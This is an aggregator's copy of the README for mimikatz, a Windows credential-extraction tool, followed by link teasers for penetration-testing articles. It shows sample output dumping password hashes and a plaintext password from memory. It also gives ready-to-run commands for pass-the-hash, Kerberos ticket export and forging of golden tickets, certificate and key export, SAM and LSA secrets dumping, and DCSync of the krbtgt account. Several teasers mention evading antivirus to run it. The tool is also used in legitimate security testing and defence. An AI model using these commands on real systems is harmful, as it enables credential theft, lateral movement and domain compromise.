GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security
source link: https://github.com/gentilkiwi/mimikatz
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
mimikatz
mimikatz is a tool I've made to learn C and make somes experiments with Windows security.
It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on https://blog.gentilkiwi.com (in French, yes).
If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
Quick usage
log
privilege::debug
sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
Build
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
- for
mimikatzandmimilib: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for
mimikatz driver,mimilove(andddk2003platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too!
You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)
Synchronize!
Build the solution
- After opening the solution,
Build/Build Solution(you can change architecture) mimikatzis now built and ready to be used! (Win32/x64evenARM64if you're lucky)- you can have error
MSB3073about_build_.cmdandmimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), butmimikatzandmimilibare OK.
- you can have error
ddk2003
With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)
For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
Continuous Integration
mimikatz project is available on AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Its status is:
Licence
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
mimikatz needs coffee to be developed:
- PayPal: https://www.paypal.me/delpy/
Author
- Benjamin DELPY
gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) - DCSync and DCShadow functions in
lsadumpmodule were co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )
This is a personal development, please respect its philosophy and don't use it for bad things!
Recommend
-
70
README.md pypykatz Mimikatz implementation in pure Python Goals First step is to have the minidump file parsing capability done in a platform independent way, so you can enjoy w...
-
14
内网渗透中的mimikatz 三好学生 ·
-
43
*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载 前言 平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。...
-
17
一、前言 攻击者在获取到Windows shell之后,有可能会上传Mimikatz提取用户凭证。由于提取密码是本地操作,在执行时并没有网络流量产生,而ips,waf网络设备能检测到的Mimikatz相关流量主要是通过上传、下载、...
-
29
*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 目标机system权限,安装了360,准备获取密码。 mimikatz的exe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀的死死的,...
-
29
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、
-
29
目录 mimikatz模块的加载 mimikatz模块的使用 mimikatz_command模块的用法
-
10
0x00 前言 Mimikatz中的mimilib(ssp)和misc::memssp同sekurlsa::wdigest的功能相同,都能够从lsass进程中提取凭据,通常可获得已登录用户的明文口令(Windows Server 2008 R2及更高版本的系统默认无法获得),但实现原...
-
10
0x00 前言 Mimikatz中sekurlsa::wdigest是渗透测试中经常会用到的功能,它能够从lsass进程中提取凭据,通常可获得已登录用户的明文口令(Windows Server 2008 R2及更高版本的系统默认无法获得,需要修改注册表等待用户再次登录才能获得) ...
-
8
作者: 腾讯IT技术 原文链接:https://mp.weixin.qq.com/s/VZWM3p-XPX7JP23s-R859A 渗透的本质就是信息搜集,在后渗透阶段获取目标机器权限后,经常需要获取...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK